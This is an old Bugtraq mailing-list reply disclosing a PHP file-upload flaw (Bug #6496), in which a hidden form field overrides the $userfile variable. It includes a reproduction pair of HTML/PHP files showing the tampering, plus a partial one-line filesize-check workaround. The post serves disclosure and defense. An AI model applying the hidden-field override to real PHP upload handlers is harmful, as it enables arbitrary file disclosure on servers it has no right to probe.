Re: (SRADV00001) Arbitrary file disclosure through PHP file upload

[Signal 11 <signal11 () MEDIAONE NET>]

I have forwarded the original message to php-dev () lists php net,
as there was no indication the developers were copied on the
bugtraq post.

This issue is Bug ID #6496 in the PHP bug database.
Additional information is here: http://bugs.php.net/bugs.php?id=6496,
and was entered 09/01/2000.

However, the problem was discovered as early as May 15 by hgerlach () gmx de
Original post: http://www.php.net/manual/features.file-upload.php
(about 2/3rds of the way down in the user comments)

Also, my copy of PHP has track_vars enabled per default (as per the
php4 that ships with Mandrake 7), which was one of the recommendations
you made in your original post.

Here's how you can reproduce this on your own. Create the following
file as "test.php" on the http server running php:

<!-- test.php ##################################################### -->
<html>
<body>
<form action="<?php echo $PHP_SELF ?>" method="POST"
        ENCTYPE="multipart/form-data">
    <input type="file" name="userfile">
    <input type="submit">
</form>
<pre>
<?php
   echo("userfile       =$userfile      \n");
   echo("userfile_name = $userfile_name \n");
   echo("userfile_type = $userfile_type \n");
   echo("userfile_size = $userfile_size \n");
?>
</pre>
</body>
</html>
<! -- CUT HERE #################################################### -->

Now, create a file on your LOCAL computer called test.html with
the following contents:

<!-- test.html ##################################################### -->
<html>
<body>
<form action="http://YOUR_SERVER_HERE/blah/blah/test.php";
        ENCTYPE="multipart/form-data" method="POST">
    <input type="file" name="userfile">
    <input type="hidden" name="userfile" value="hackme">
    <input type="submit">
</form>
</body>
</html>
<! -- CUT HERE #################################################### -->

Goto http://YOUR_SERVER_HERE/blah/blah/test.php and run the script,
upload any file. Note the output. Now open test.html on your LOCAL
computer and repeat the same steps you did when you were on the
server. Hit submit. Note the change in output.

Now, before you go off the deep end there is a simple one-line
workaround...

<?php
        if($userfile_size != filesize($userfile)){
                echo "File upload variables have been tampered with.\n";
        }

?>

This will prevent most attacks, unless the filesize is the same
as the local file. Like I said - workaround.. but it is one you
can impliment in your code *now* instead of waiting for a patch.

I'm hoping the PHP guys will update the bug 6496 with either
a fix or an assignment soon...


--
Signal 11 -o- BOFH, boredengineers.com
Q: What's the difference between your project and putting wings
on an elephant?  A: The elephant *might* fly.